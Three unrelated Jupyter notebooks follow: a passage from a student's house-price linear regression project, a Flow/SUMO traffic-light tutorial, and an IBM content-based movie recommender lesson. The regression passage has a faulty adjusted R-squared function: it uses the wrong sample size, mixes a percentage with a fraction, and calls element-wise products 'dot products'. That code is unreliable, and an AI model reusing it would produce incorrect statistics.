model results and determine our MSE. Notice that we compute our MSE on the test set and not the train set ### Dot Product (multiple feature) Assessment ``` #Models Living Area alone and compares it to the Dot Product of Living Area with each other feature ##Determining if a MLR would be a better way to visualize the data features = data[['living_area', 'garage_area', 'lot_area', 'firstfloor_sqft', 'bath']] count = 0 for feature in features: feature = features.iloc[:, count] #print(feature.head(0)) if feature.name == 'living_area': x = data['living_area'] else: x = feature * data['living_area'] # Compute the Coefficients beta0, beta1 = compute_estimators(x, target) # Print the Intercept and Slope if feature.name == 'living_area': print('living_area') print('beta0:', beta0) print('beta1:', beta1) else: print(feature.name, "* living_area") print('beta0:', beta0) print('beta1:', beta1) # Compute the Train and Test Predictions y_hat = model_predictions(beta0, beta1, x) # Plot the Model Scatter if feature.name == 'living_area': name = 'living_area' else: name = feature.name + " " + "* living_area" model = plotting_model(x.values.reshape(-1, 1), target, y_hat, name) # Compute the MSE mse = mean_square_error(target, y_hat) print('mean squared error:', mse) print() count+=1 ``` ## Analysis Based on the models, it appears that two of the dot products provide a more accurate model: 1. Living Area * First Floor SqFt 2. Living Area * Garage Area These two dot products provide a lower MSE and thus lowers the loss per prediction point. #1. My intuition says that since Living Area, as a feature, will include First Floor SqFt in its data. The FirstFloor SqFt can be captured by Living Area, so it can be left out. Additionally, since one is included within the other, we cannot say anything in particular about Living Area or FirstFloor SqFt individually. Also, the correlation (Ln 24 & Out 24) between Living Area and FirstFloor SqFt is 0.53, which is the highest apart from Bath. This correlation is low in comparison to the "standard;" however, that standard is arbitrary. I've lowered it to be in context with data sets I'm working with in this notebook. #2. The dot product of Living Area & Garage Area provides doesn't allow us to make a statement about each individually, unless we provide a model of each, which I will do below. This dot product is a better model. Garage Area is advertised as 'bonus' space and CANNOT be included in the overall square footage of the home (i.e. living area). Thus, garage area vector will not be included as an implication within the living area vector making them linearly independent. Garage Area can be a sought after feature depending on a buyer's desired lifestlye; more garage space would be sought after by buyers with more cars, which allows us to draw a couple possible inferences about the buyers: 1. enough net worth/monthly to make payments on multiple vehicles plus make payments on a house/garage 2. enough disposable income to outright buy multiple vehicles plus make payments on a house/garage Additionally, it stands to reason that garage area would scale with living area for pragmatic reasons (more living area implies more people and potentially more vehicles) and for aesthetic reasons (more living area makes home look larger and would need larger garage). Homes with more living area and garage area may be sought after by buyers with the ability to spend more on a home, and thus the market would bear a higher price for those homes, which helps explain why living area * garage area is a better indicator of home price. #### Conclusion Combining living area with other features lowered the MSE for each. The lowest MSE is living area * garage area, which confirms my hypothesis: Living Area is the best feature to predict price, and garage area is good when used in conjunction. ``` #Modeling Living Area & Garage Area separately. features = data[['living_area', 'garage_area']] count = 0 for feature in features: feature = features.iloc[:, count] if feature.name == 'living_area': x = data['living_area'] elif feature.name == 'garage_area': x = data['garage_area'] beta0, beta1 = compute_estimators(x, target) count+=1 if feature.name == 'living_area': print('living_area') print('beta0:', beta0) print('beta1:', beta1) elif feature.name == 'garage_area': print('garage_area') print('beta0:', beta0) print('beta1:', beta1) y_hat = model_predictions(beta0, beta1, x) if feature.name == 'living_area': name = 'living_area' elif feature.name == 'garage_area': name = 'garage_area' model = plotting_model(x.values.reshape(-1, 1), target, y_hat, name) mse = mean_square_error(target, y_hat) print('mean squared error:', mse) print() #Modeling dot product of Living Area * Garage Area features = data[['living_area']] x = features.iloc[:, 0] x2 = x * data['garage_area'] #x3 = x2 * data['bath'] # Compute the Coefficients beta0, beta1 = compute_estimators(x2, target) # Print the Intercept and Slope print('Name: garage_area * living_area') print('beta0:', beta0) print('beta1:', beta1) # Compute the Train and Test Predictions y_hat_1 = model_predictions(beta0, beta1, x2) # Plot the Model Scatter name = 'garage_area * living_area' model = plotting_model(x2.values.reshape(-1, 1), target, y_hat_1, name) # Compute the MSE mse = mean_square_error(target, y_hat_1) print('mean squared error:', mse) print() ``` ## Reasoning Above, I modeled both living area and garage area by themselves then the dot product of Living Area * Garage Area to highlight the MSE of each vs. the MSE of the dot product. Garage Area, much more so than Living Area, has a high MSE indicating that on its own, Garage Area isn't the best predictor of a home's price; we must take the data in context with reality, and intuitively speaking, one wouldn't assume that the garage area, on its own, would be a feature indicative of price. This fact combined with the assumption/implication that garage may scale with living area implies some correlation between the features, which would go against the linear assumption of feature independence. As a matter of fact, there is a correlation between them (Ln 24 & Out 24) of 0.44; however, this isn't problematic for two reasons: 1. 0.44 is quite low in regard to typical correlation standards. 2. Data must be seen in context. #1. Although I eliminated First Floor SqFt due, in part, to a high correlation and that correclation is only 0.09 points lower. The main reason why First Floor SqFt is eliminated is due to its inclusion within the living area vector. Additionally, the main reason why I'm including garage area is because it is not included with the living area vector. #2. Similar to my #1 explanation, knowing that garage area is 'bonus space' and, as such, is NOT included in a home's advertised square feet indicates that it isn't within the Living Area data set in the same way FF SqFt or Baths would be. It will most likely to scale with the living area independently of the living area making it a good fit for a MLR. ### 3. Model Interpretation Now that you have calculated all the individual models in the dataset, provide an analytics rationale for which model has performed best. To provide some additional assessment metrics, let's create a function to compute the R-Squared. #### Mathematically: $$R^2 = \frac {SS_{Regression}}{SS_{Total}} = 1 - \frac {SS_{Error}}{SS_{Total}}$$<br> where:<br> $SS_{Regression} = \sum (\widehat {y_i} - \bar {y_i})^2$<br> $SS_{Total} = \sum ({y_i} - \bar {y_i})^2$<br> $SS_{Error} = \sum ({y_i} - \widehat {y_i})^2$ ``` #ssr = sum of squares of regression --> variance of prediction from the mean #sst = sum of squares total --> variance of the actuals from the prediction #sse = sume of squares error --> variance of the atuals from the mean def r_squared(y_outcome, predictions): """ Compute the R Squared """ ssr = np.sum((predictions - np.mean(y_outcome))**2) sst = np.sum((y_outcome - np.mean(y_outcome))**2) sse = np.sum((y_outcome - predictions)**2) # print(sse, "/", sst) print("1 - SSE/SST =", round((1 - (sse/sst))*100), "%") rss = (ssr/sst) * 100 return rss ``` Now that you we have R Squared calculated, evaluate the R Squared for the test group across all models and determine what model explains the data best. ``` rss = r_squared(target, y_hat_1) print("R-Squared =", round(rss), "%") count += 1 ``` ### R-Squared Adjusted $R^2-adjusted = 1 - \frac {(1-R^2)(n-1)}{n-k-1}$ ``` def r_squared_adjusted(rss, sample_size, regressors): n = np.size(sample_size) k = regressors numerator = (1-rss)*(n) denominator = n-k-1 rssAdj = 1 - (numerator / denominator) return rssAdj rssAdj = r_squared_adjusted(rss, y_hat_1, 2) print(round(rssAdj), "%") ``` ### 4. Model Diagnostics Linear regressions depends on meetings assumption in the model. While we have not yet talked about the assumptions, you goal is to research and develop an intuitive understanding of why the assumptions make sense. We will walk through this portion on Multiple Linear Regression Project
github_jupyter
# Tutorial 10: Traffic Lights This tutorial walks through how to add traffic lights to experiments. This tutorial will use the following files: * Experiment script for RL version of traffic lights in grid: `examples/rllib/traffic_light_grid.py` * Experiment script for non-RL version of traffic lights in grid: `examples/sumo/traffic_light_grid.py` * Network: `traffic_light_grid.py` (class TrafficLightGridNetwork) * Environment for RL version of traffic lights in grid: (class TrafficLightGridEnv) * Environment for non-RL version of traffic lights in grid: (class AccelEnv) There are two main classes of traffic lights that Sumo supports: (1) actuated and (2) static traffic lights. This tutorial will cover both types. Moreover, in this tutorial, we'll discuss another type of traffic light. In total, we have 4 types of traffic lights in the Flow: 1. Static Traffic Lights --> (Section 3) 2. Actuated Traffic Lights --> (Section 4) 3. Actuated Baseline Traffic Lights --> (Section 5) 4. RL Traffic Lights --> (Section 6) Let's begin! First, import all necessary classes. ``` from flow.core.params import NetParams from flow.networks.grid import TrafficLightGridNetwork from flow.core.params import TrafficLightParams from flow.core.params import SumoParams, EnvParams, InitialConfig, NetParams, \ InFlows, SumoCarFollowingParams from flow.core.params import VehicleParams import numpy as np ``` ## 1. New parameters in `additional_net_params` There are a few unique additions to `additional_net_params` in the traffic light grid environments to be aware of. They are the following 2 items: #### grid_array `grid_array` passes information on the road network to the network, specifying the parameters you see below: `row_num`, `col_num`, `inner_length`, `short_length`, `long_length`, `cars_top`, `cars_bot`, `cars_left`, `cars_right`. This is required for any traffic light grid experiment. #### tl_logic `tl_logic` should be used for users who want to exert more control over individual traffic lights. `tl_logic` simply tells the env whether the traffic lights are controlled by RL or whether a default pattern or SUMO actuation is to be used. Use "actuated" if you want SUMO to control the traffic lights. For this tutorial, we will assume the following parameters for the `grid_array`, which specifies a traffic light grid network with 2 rows and 3 columns. `traffic_lights` should be set to `True` for every experiment in this tutorial. ``` inner_length = 300 long_length = 500 short_length = 300 n = 2 # rows m = 3 # columns num_cars_left = 20 num_cars_right = 20 num_cars_top = 20 num_cars_bot = 20 tot_cars = (num_cars_left + num_cars_right) * m \ + (num_cars_top + num_cars_bot) * n grid_array = {"short_length": short_length, "inner_length": inner_length, "long_length": long_length, "row_num": n, "col_num": m, "cars_left": num_cars_left, "cars_right": num_cars_right, "cars_top": num_cars_top, "cars_bot": num_cars_bot} ``` ## 2. Defining Traffic Light Phases To start off, we define how SUMO represents traffic light phases. A phase is defined as the states that the traffic lights around an intersection can take. The phase of a typical four-way, traffic-light-controlled intersection is modeled by a string (of length 4, 8, or 12, etc., depending on the structure of the intersection). Consider the phase "GrGr". Every letter in this phase string ("G", "r", "G", "r") corresponds to a signal of an edge in the intersection, in clockwise order (starting from the northbound). Explicitly, the northern and southern edges of the intersection both have a state of "G" (green), where the eastern and western edges of the intersection both have a state of "r" (red). In this example, the intersection has 4 edges, each edge has one lane, and the only possible direction is going straight. Each character within a phase's state describes the state of one signal of the traffic light. Please note, that a single lane may contain several signals - for example one for vehicles turning left and one for vehicles which move straight (in this case, we may have something like "GgrrGgrr"). In other words, a signal does not control lanes, but links - each connecting a lane which is incoming into a junction to one which is outgoing from this junction. For more information about traffic light states, please refer to https://sumo.dlr.de/wiki/Simulation/Traffic_Lights#Signal_state_definitions NOTE: If the API is used at any point to modify the traffic light state, i.e. functions such as `setRedYellowGreenState`, this will override the traffic light's default phase. To do anything with traffic lights, you should interface with Flow's `TrafficLightParams` class Once the `TrafficLightParams` class is instantiated, traffic lights can be added via the `add` function. One prerequisite of using this function is knowing the node id of any node you intend to manipulate. This information is baked into the experiment's network class, as well as the experiment's `nod.xml` file. For the experiment we are using with 2 rows and 3 columns, there are 6 nodes: "center0" to "center5". This will be the ordering of "centers" in our network: ``` | | | -3-4-5- | | | -0-1-2- | | | tl_logic = TrafficLightParams() nodes = ["center0", "center1", "center2", "center3", "center4", "center5"] phases = [{"duration": "31", "state": "GrGr"}, {"duration": "6", "state": "yryr"}, {"duration": "31", "state": "rGrG"}, {"duration": "6", "state": "ryry"}] ``` In this particular example, each of the 6 intersections corresponds to the same set of possible phases; in other words, at any time, all intersections will be at the same phase in this example. ``` for node_id in nodes: tl_logic.add(node_id, tls_type="static", programID="1", offset=None, phases=phases) ``` You can, however, customize a network in which each traffic light node has different phases. Following this step, the instance `tl_logic` of `TrafficLightParams` class should be passed into the network as element `traffic_lights`. ``` additional_net_params = {"grid_array": grid_array, "speed_limit": 35, "horizontal_lanes": 1, "vertical_lanes": 1, "traffic_lights": True} net_params = NetParams(no_internal_links=False, additional_params=additional_net_params) network = TrafficLightGridNetwork(name="grid", vehicles=VehicleParams(), net_params=net_params, initial_config=InitialConfig(), traffic_lights=tl_logic) ``` That's it! The traffic light logic will be passed into Flow's internals, which will generate an additional file containing all of the information needed to generate the traffic lights you specified in the simulation. ## 3. Static Traffic Lights Static traffic lights are traffic lights with pre-defined phases. They cannot dynamically adjust according to the traffic needs; they simply follow the same pattern repeatedly. To see static traffic lights in action, the `TrafficLightParams` object should be instantiated with `baseline=False`. When adding individual traffic lights, the following parameters in addition to `node_id` are involved: * `tls_type`: _[optional]_ str, specifies actuated or static traffic lights, defaults to static * `programID`: _[optional]_ str, the program name for this traffic light. It cannot be the same ID as the base program, which is 0, defaults to 10 * `offset`: _[optional]_ int, the initial time offset of the program An example of adding one static traffic light to our system is as follows: ``` tl_logic = TrafficLightParams(baseline=False) phases = [{"duration": "31", "state": "GrGr"}, {"duration": "6", "state": "yryr"}, {"duration": "31", "state": "rGrG"}, {"duration": "6", "state": "ryry"}] tl_logic.add("center0", phases=phases, programID=1) ``` ## 4. Actuated Traffic Lights For more flexibility than the static traffic lights defined above, and more control than RL-controlled traffic lights, actuated traffic lights are a good option to consider. To explain the actuated traffic lights, we refer to an excerpt from SUMO's documentation: "SUMO supports gap-based actuated traffic control. This control scheme is common in Germany and works by prolonging traffic phases whenever a continuous stream of traffic is detected. It switches to the next phase after detecting a sufficent time gap between sucessive vehicles. This allows for better distribution of green-time among phases and also affects cycle duration in response to dynamic traffic conditions." The difference between phases for static and actuated traffic lights is that actuated traffic light has two additional parameters in `phases`, namely `minDur` and `maxDur`, which describe the allowed range of time durations for each phase. `minDur` is the minimum duration the phase will be held for, and `masDur` is the maximum duration the phase will be held for. In addition to these parameters of `phases` and all the required parameters of static of traffic lights, the following optional parameters are involved. The default values are set by SUMO: * `maxGap`: _[optional]_ int, describes the maximum time gap between successive vehicle sthat will cause the current phase to be prolonged * `detectorGap`: _[optional]_ int, determines the time distance between the (automatically generated) detector and the stop line in seconds (at each lane's maximum speed) * `showDetectors`: _[optional]_ bool, toggles whether or not detectors are shown in sumo-gui * `file`: _[optional]_ str, the file into which the detector shall write results * `freq`: _[optional]_ int, the period over which collected values shall be aggregated An example of adding two actuated traffic lights to our system is as follows. The first trafic lights corresponds to more custom control, while the second one specifies minimal control. ``` tl_logic = TrafficLightParams(baseline=False) phases = [{"duration": "31", "minDur": "8", "maxDur": "45", "state": "GrGr"}, {"duration": "6", "minDur": "3", "maxDur": "6", "state": "yryr"}, {"duration": "31", "minDur": "8", "maxDur": "45", "state": "rGrG"}, {"duration": "6", "minDur": "3", "maxDur": "6", "state": "ryry"}] tl_logic.add("center1", tls_type="actuated", programID="1", phases=phases, maxGap=5.0, detectorGap=0.9, showDetectors=False) tl_logic.add("center2", tls_type="actuated") ``` ## 5. Actuated Baseline Traffic Lights We have developed an actuated traffic light "baseline" that can be used for any experiments on a grid. This baseline uses actuated traffic lights (section 4), and has been fine-tuned on many iterations of experiments with varying parameters. The actual parameters are located in the `TrafficLightParams` class under the getter function `actuated_default()`. For reference, these values are: ``` tl_type = "actuated" program_id = 1 max_gap = 3.0 detector_gap = 0.8 show_detectors = True phases = [{"duration": "31", "minDur": "8", "maxDur": "45", "state": "GrGr"}, {"duration": "6", "minDur": "3", "maxDur": "6", "state": "yryr"}, {"duration": "31", "minDur": "8", "maxDur": "45", "state": "rGrG"}, {"duration": "6", "minDur": "3", "maxDur": "6", "state": "ryry"}] ``` To see the actuated baseline traffic lights in action, simply initialize the TrafficLightParams class with the `baseline` argument set to `True`, and pass it into the `additional_net_params`. Nothing else needs to be done; no traffic lights need to be added. ``` tl_logic = TrafficLightParams(baseline=True) additional_net_params = {"grid_array": grid_array, "speed_limit": 35, "horizontal_lanes": 1, "vertical_lanes": 1, "traffic_lights": True, "tl_logic": tl_logic} ``` ## 6. Controlling Your Traffic Lights via RL This is where we switch from the non-RL experiment script to the RL experiment. To control traffic lights via RL, no `tl_logic` element is necessary. This is because the RL agent is controlling all the parameters you were able to customize in the prior sections. The `additional_net_params` should look something like this: ``` additional_net_params = {"speed_limit": 35, "grid_array": grid_array, "horizontal_lanes": 1, "vertical_lanes": 1, "traffic_lights": True} ``` This will enable the program to recognize all nodes as traffic lights. The experiment then gives control to the environment; we are using `TrafficLightGridEnv`, which is an environment created for applying RL-specified traffic light actions (e.g. change the state) via TraCI. This is all you need to run an RL experiment! It is worth taking a look at the `TrafficLightGridEnv` class to further understanding of the experiment internals. The rest of this tutorial is an optional walkthrough through the various components of `TrafficLightGridEnv`: ### Keeping Track of Traffic Light State Flow keeps track of the traffic light states (i.e. for each intersection, time elapsed since the last change, which direction traffic is flowing, and whether or not the traffic light is currently displaying yellow) in the following variables: ``` # keeps track of the last time the traffic lights in an intersection were allowed to change (the last time the lights were allowed to change from a red-green state to a red-yellow state.). self.last_change = np.zeros((self.rows * self.cols, 1)) # keeps track of the direction of the intersection (the direction that is currently being allowed to flow. 0 indicates flow from top to bottom, and 1 indicates flow from left to right.) self.direction = np.zeros((self.rows * self.cols, 1)) # value of 1 indicates that the intersection is in a red-yellow state (traffic lights are red for one way (e.g. north-south), while the traffic lights for the other way (e.g. west-east) are yellow . 0 indicates that the intersection is in a red-green state. self.currently_yellow = np.zeros((self.rows * self.cols, 1)) ``` * The variable `self.last_change` indicates the last time the lights were allowed to change from a red-green state to a red-yellow state. * The variable `self.direction` indicates the direction of the intersection, i.e. the direction that is currently being allowed to flow. 0 indicates flow from top to bottom, and 1 indicates flow from left to right. * The variable `self.currently_yellow` with a value of 1 indicates that the traffic light is in a red-yellow state. 0 indicates that the traffic light is in a red-green state. `self.last_change` is contingent on an instance variable `self.min_switch_time`. This is a variable that can be set in `additional_env_params` with the key name `switch_time`. Setting `switch_time` enables more control over the RL experiment by preventing traffic lights from switching until `switch_time` timesteps have occurred. In practice, this can be used to prevent flickering. ``` additional_env_params = {"target_velocity": 50, "switch_time": 3.0} ``` ### Elements of RL for Controlling Traffic Lights #### Action Space The action space may be any set of actions the user wishes the agent to do. In this example, the action space for RL-controlled traffic lights directly matches the number of traffic intersections in the system. Each intersection (traffic light node) corresponds to an action. The action space is thus defined as: ``` @property def action_space(self): if self.discrete: return Discrete(2 ** self.num_traffic_lights) else: return Box( low=0, high=1, shape=(self.num_traffic_lights,), dtype=np.float32) ``` In the case that the action space is discrete, we need 1-bit (that can be 0 or 1) for the action of each traffic light node. Hence, we need `self.num_traffic_lights` bits to represent the action space. To make a `self.num_traffic_lights`-bit number, we use the pyhton's `Discrete(range)`, and since we have `self.num_traffic_lights` bits, the `range` will be 2^`self.num_traffic_lights`. In the case that the action space is continuous, we use a range (that is currently (0,1)) of numbers for each traffic light node. Hence, we will define `self.num_traffic_lights` "Boxes", each in the range (0,1). Note that the variable `num_traffic_lights` is actually the number of intersections in the grid system, not the number of traffic lights. Number of traffic lights in our example is 4 times the number of intersections #### Observation Space The observation space may be any set of state information the user wishes to provide to the agent. This information may fully or partially describe the state of the environment. The existing observation space for this example is designed to be a fully observable state space with the following metrics. For all vehicle, we want to know its velocity, its distance (in [unit]) from the next intersection, and the unique edge it is traveling on. For each traffic light, we want to know its current state (i.e. what direction it is flowing), when it last changed, and whether it was yellow. ``` @property def observation_space(self): speed = Box( low=0, high=1, shape=(self.initial_vehicles.num_vehicles,), dtype=np.float32) dist_to_intersec = Box( low=0., high=np.inf, shape=(self.initial_vehicles.num_vehicles,), dtype=np.float32) edge_num = Box( low=0., high=1, shape=(self.initial_vehicles.num_vehicles,), dtype=np.float32) traffic_lights = Box( low=0., high=1, shape=(3 * self.rows * self.cols,), dtype=np.float32) return Tuple((speed, dist_to_intersec, edge_num, traffic_lights)) ``` Note that in the case that the observation space is not fully-observable (e.g. cannot observe all the vehicles in the system), the observation space should be changed to only include those state information that are observable (e.g. velocity of N closest vehicles to an intersection) #### State Space The state space collects the information that the `observation_space` specifies. There are helper functions that exist in the `TrafficLightGridEnv` to construct the state space. ``` def get_state(self): # compute the normalizers grid_array = self.net_params.additional_params["grid_array"] max_dist = max(grid_array["short_length"], grid_array["long_length"], grid_array["inner_length"]) # get the state arrays speeds = [ self.k.vehicle.get_speed(veh_id) / self.k.network.max_speed() for veh_id in self.k.vehicle.get_ids() ] dist_to_intersec = [ self.get_distance_to_intersection(veh_id) / max_dist for veh_id in self.k.vehicle.get_ids() ] edges = [ self._convert_edge(self.k.vehicle.get_edge(veh_id)) / (self.k.network.network.num_edges - 1) for veh_id in self.k.vehicle.get_ids() ] state = [ speeds, dist_to_intersec, edges, self.last_change.flatten().tolist(), self.direction.flatten().tolist(), self.currently_yellow.flatten().tolist() ] return np.array(state) ``` #### Reward The agents in an RL network will learn to maximize a certain reward. This objective can be defined in terms of maximizing rewards or minimizing the penalty. In this example, we penalize the large delay and boolean actions that indicate a switch (with the negative sign). ``` def compute_reward(self, rl_actions, **kwargs): return - rewards.min_delay_unscaled(self) - rewards.boolean_action_penalty(rl_actions >= 0.5, gain=1.0) ``` #### Apply RL Actions In the `_apply_rl_actions` function, we specify what actions our agents should take in the environment. In this example, the agents (traffic light nodes) decide based on the action value how to change the traffic lights. ``` def _apply_rl_actions(self, rl_actions): """See class definition.""" # check if the action space is discrete if self.discrete: # convert single value to list of 0's and 1's rl_mask = [int(x) for x in list('{0:0b}'.format(rl_actions))] rl_mask = [0] * (self.num_traffic_lights - len(rl_mask)) + rl_mask else: # convert values less than 0.5 to zero and above 0.5 to 1. 0 # indicates that we should not switch the direction, and 1 indicates # that switch should happen rl_mask = rl_actions > 0.5 # Loop through the traffic light nodes for i, action in enumerate(rl_mask): if self.currently_yellow[i] == 1: # currently yellow # Code to change from yellow to red ... else: # Code to change to yellow ... ``` These are the portions of the code that are hidden from the above code for shortening the code: ``` # Code to change from yellow to red self.last_change[i] += self.sim_step # Check if our timer has exceeded the yellow phase, meaning it # should switch to red if self.last_change[i] >= self.min_switch_time: if self.direction[i] == 0: self.k.traffic_light.set_state( node_id='center{}'.format(i), state="GrGr") else: self.k.traffic_light.set_state( node_id='center{}'.format(i), state='rGrG') self.currently_yellow[i] = 0 # Code to change to yellow if action: if self.direction[i] == 0: self.k.traffic_light.set_state( node_id='center{}'.format(i), state='yryr') else: self.k.traffic_light.set_state( node_id='center{}'.format(i), state='ryry') self.last_change[i] = 0.0 self.direction[i] = not self.direction[i] self.currently_yellow[i] = 1 ```
github_jupyter
<a href="https://www.bigdatauniversity.com"><img src = "https://ibm.box.com/shared/static/cw2c7r3o20w9zn8gkecaeyjhgw3xdgbj.png" width = 400, align = "center"></a> <h1 align=center><font size = 5>CONTENT-BASED FILTERING</font></h1> Recommendation systems are a collection of algorithms used to recommend items to users based on information taken from the user. These systems have become ubiquitous can be commonly seen in online stores, movies databases and job finders. In this notebook, we will explore Content-based recommendation systems and implement a simple version of one using Python and the Pandas library. ### Table of contents <div class="alert alert-block alert-info" style="margin-top: 20px"> - <p><a href="#ref1">Acquiring the Data</a></p> - <p><a href="#ref2">Preprocessing</a></p> - <p><a href="#ref3">Content-Based Filtering</a></p> <p></p> </div> <br> <a id="ref1"></a> # Acquiring the Data To acquire and extract the data, simply run the following Bash scripts: Dataset acquired from [GroupLens](http://grouplens.org/datasets/movielens/). Lets download the dataset. To download the data, we will use **`!wget`**. To download the data, we will use `!wget` to download it from IBM Object Storage. __Did you know?__ When it comes to Machine Learning, you will likely be working with large datasets. As a business, where can you host your data? IBM is offering a unique opportunity for businesses, with 10 Tb of IBM Cloud Object Storage: [Sign up now for free](http://cocl.us/ML0101EN-IBM-Offer-CC) ``` !wget -O moviedataset.zip https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/ML0101ENv3/labs/moviedataset.zip print('unziping ...') !unzip -o -j moviedataset.zip ``` Now you're ready to start working with the data! <a id="ref2"></a> # Preprocessing First, let's get all of the imports out of the way: ``` #Dataframe manipulation library import pandas as pd #Math functions, we'll only need the sqrt function so let's import only that from math import sqrt import numpy as np import matplotlib.pyplot as plt %matplotlib inline ``` Now let's read each file into their Dataframes: ``` #Storing the movie information into a pandas dataframe movies_df = pd.read_csv('movies.csv') #Storing the user information into a pandas dataframe ratings_df = pd.read_csv('ratings.csv') #Head is a function that gets the first N rows of a dataframe. N's default is 5. movies_df.head() ``` Let's also remove the year from the __title__ column by using pandas' replace function and store in a new __year__ column. ``` #Using regular expressions to find a year stored between parentheses #We specify the parantheses so we don't conflict with movies that have years in their titles movies_df['year'] = movies_df.title.str.extract('(\(\d\d\d\d\))',expand=False) #Removing the parentheses movies_df['year'] = movies_df.year.str.extract('(\d\d\d\d)',expand=False) #Removing the years from the 'title' column movies_df['title'] = movies_df.title.str.replace('(\(\d\d\d\d\))', '') #Applying the strip function to get rid of any ending whitespace characters that may have appeared movies_df['title'] = movies_df['title'].apply(lambda x: x.strip()) movies_df.head() ``` With that, let's also split the values in the __Genres__ column into a __list of Genres__ to simplify future use. This can be achieved by applying Python's split string function on the correct column. ``` #Every genre is separated by a | so we simply have to call the split function on | movies_df['genres'] = movies_df.genres.str.split('|') movies_df.head() ``` Since keeping genres in a list format isn't optimal for the content-based recommendation system technique, we will use the One Hot Encoding technique to convert the list of genres to a vector where each column corresponds to one possible value of the feature. This encoding is needed for feeding categorical data. In this case, we store every different genre in columns that contain either 1 or 0. 1 shows that a movie has that genre and 0 shows that it doesn't. Let's also store this dataframe in another variable since genres won't be important for our first recommendation system. ``` #Copying the movie dataframe into a new one since we won't need to use the genre information in our first case. moviesWithGenres_df = movies_df.copy() #For every row in the dataframe, iterate through the list of genres and place a 1 into the corresponding column for index, row in movies_df.iterrows(): for genre in row['genres']: moviesWithGenres_df.at[index, genre] = 1 #Filling in the NaN values with 0 to show that a movie doesn't have that column's genre moviesWithGenres_df = moviesWithGenres_df.fillna(0) moviesWithGenres_df.head() ``` Next, let's look at the ratings dataframe. ``` ratings_df.head() ``` Every row in the ratings dataframe has a user id associated with at least one movie, a rating and a timestamp showing when they reviewed it. We won't be needing the timestamp column, so let's drop it to save on memory. ``` #Drop removes a specified row or column from a dataframe ratings_df = ratings_df.drop('timestamp', 1) ratings_df.head() ``` <a id="ref3"></a> # Content-Based recommendation system Now, let's take a look at how to implement __Content-Based__ or __Item-Item recommendation systems__. This technique attempts to figure out what a user's favourite aspects of an item is, and then recommends items that present those aspects. In our case, we're going to try to figure out the input's favorite genres from the movies and ratings given. Let's begin by creating an input user to recommend movies to: Notice: To add more movies, simply increase the amount of elements in the __userInput__. Feel free to add more in! Just be sure to write it in with capital letters and if a movie starts with a "The", like "The Matrix" then write it in like this: 'Matrix, The' . ``` userInput = [ {'title':'Breakfast Club, The', 'rating':5}, {'title':'Toy Story', 'rating':3.5}, {'title':'Jumanji', 'rating':2}, {'title':"Pulp Fiction", 'rating':5}, {'title':'Akira', 'rating':4.5} ] inputMovies = pd.DataFrame(userInput) inputMovies ``` #### Add movieId to input user With the input complete, let's extract the input movies's ID's from the movies dataframe and add them into it. We can achieve this by first filtering out the rows that contain the input movies' title and then merging this subset with the input dataframe. We also drop unnecessary columns for the input to save memory space. ``` #Filtering out the movies by title inputId = movies_df[movies_df['title'].isin(inputMovies['title'].tolist())] #Then merging it so we can get the movieId. It's implicitly merging it by title. inputMovies = pd.merge(inputId, inputMovies) #Dropping information we won't use from the input dataframe inputMovies = inputMovies.drop('genres', 1).drop('year', 1) #Final input dataframe #If a movie you added in above isn't here, then it might not be in the original #dataframe or it might spelled differently, please check capitalisation. inputMovies ``` We're going to start by learning the input's preferences, so let's get the subset of movies that the input has watched from the Dataframe containing genres defined with binary values. ``` #Filtering out the movies from the input userMovies = moviesWithGenres_df[moviesWithGenres_df['movieId'].isin(inputMovies['movieId'].tolist())] userMovies ``` We'll only need the actual genre table, so let's clean this up a bit by resetting the index and dropping the movieId, title, genres and year columns. ``` #Resetting the index to avoid future issues userMovies = userMovies.reset_index(drop=True) #Dropping unnecessary issues due to save memory and to avoid issues userGenreTable = userMovies.drop('movieId', 1).drop('title', 1).drop('genres', 1).drop('year', 1) userGenreTable ``` Now we're ready to start learning the input's preferences! To do this, we're going to turn each genre into weights. We can do this by using the input's reviews and multiplying them into the input's genre table and then summing up the resulting table by column. This operation is actually a dot product between a matrix and a vector, so we can simply accomplish by calling Pandas's "dot" function. ``` inputMovies['rating'] #Dot produt to get weights userProfile = userGenreTable.transpose().dot(inputMovies['rating']) #The user profile userProfile ``` Now, we have the weights for every of the user's preferences. This is known as the User Profile. Using this, we can recommend movies that satisfy the user's preferences. Let's start by extracting the genre table from the original dataframe: ``` #Now let's get the genres of every movie in our original dataframe genreTable = moviesWithGenres_df.set_index(moviesWithGenres_df['movieId']) #And drop the unnecessary information genreTable = genreTable.drop('movieId', 1).drop('title', 1).drop('genres', 1).drop('year', 1) genreTable.head() genreTable.shape ``` With the input's profile and the complete list of movies and their genres in hand, we're going to take the weighted average of every movie based on the input profile and recommend the top twenty movies that most satisfy it. ``` #Multiply the genres by the weights and then take the weighted average recommendationTable_df = ((genreTable*userProfile).sum(axis=1))/(userProfile.sum()) recommendationTable_df.head() #Sort our recommendations in descending order recommendationTable_df = recommendationTable_df.sort_values(ascending=False) #Just a peek at the values recommendationTable_df.head() ``` Now here's the recommendation table! ``` #The final recommendation table movies_df.loc[movies_df['movieId'].isin(recommendationTable_df.head(20).keys())] ``` ### Advantages and Disadvantages of Content-Based Filtering ##### Advantages * Learns user's preferences * Highly personalized for the user ##### Disadvantages * Doesn't take into account what others think of the item, so low quality item recommendations might happen * Extracting data is not always intuitive * Determining what characteristics of the item the user dislikes or likes is not always obvious ## Want to learn more? IBM SPSS Modeler is a comprehensive analytics platform that has many machine learning algorithms. It has been designed to bring predictive intelligence to decisions made by individuals, by groups, by systems – by your enterprise as a whole. A free trial is available through this course, available here: [SPSS Modeler](http://cocl.us/ML0101EN-SPSSModeler). Also, you can use Watson Studio to run these notebooks faster with bigger datasets. Watson Studio is IBM's leading cloud solution for data scientists, built by data scientists. With Jupyter notebooks, RStudio, Apache Spark and popular libraries pre-packaged in the cloud, Watson Studio enables data scientists to collaborate on their projects without having to install anything. Join the fast-growing community of Watson Studio users today with a free account at [Watson Studio](https://cocl.us/ML0101EN_DSX) ### Thanks for completing this lesson! Notebook created by: <a href = "https://ca.linkedin.com/in/saeedaghabozorgi">Saeed Aghabozorgi</a>, Gabriel Garcez Barros Sousa <hr> Copyright &copy; 2018 [Cognitive Class](https://cocl.us/DX0108EN_CC). This notebook and its source code are released under the terms of the [MIT License](https://bigdatauniversity.com/mit-license/).​
github_jupyter
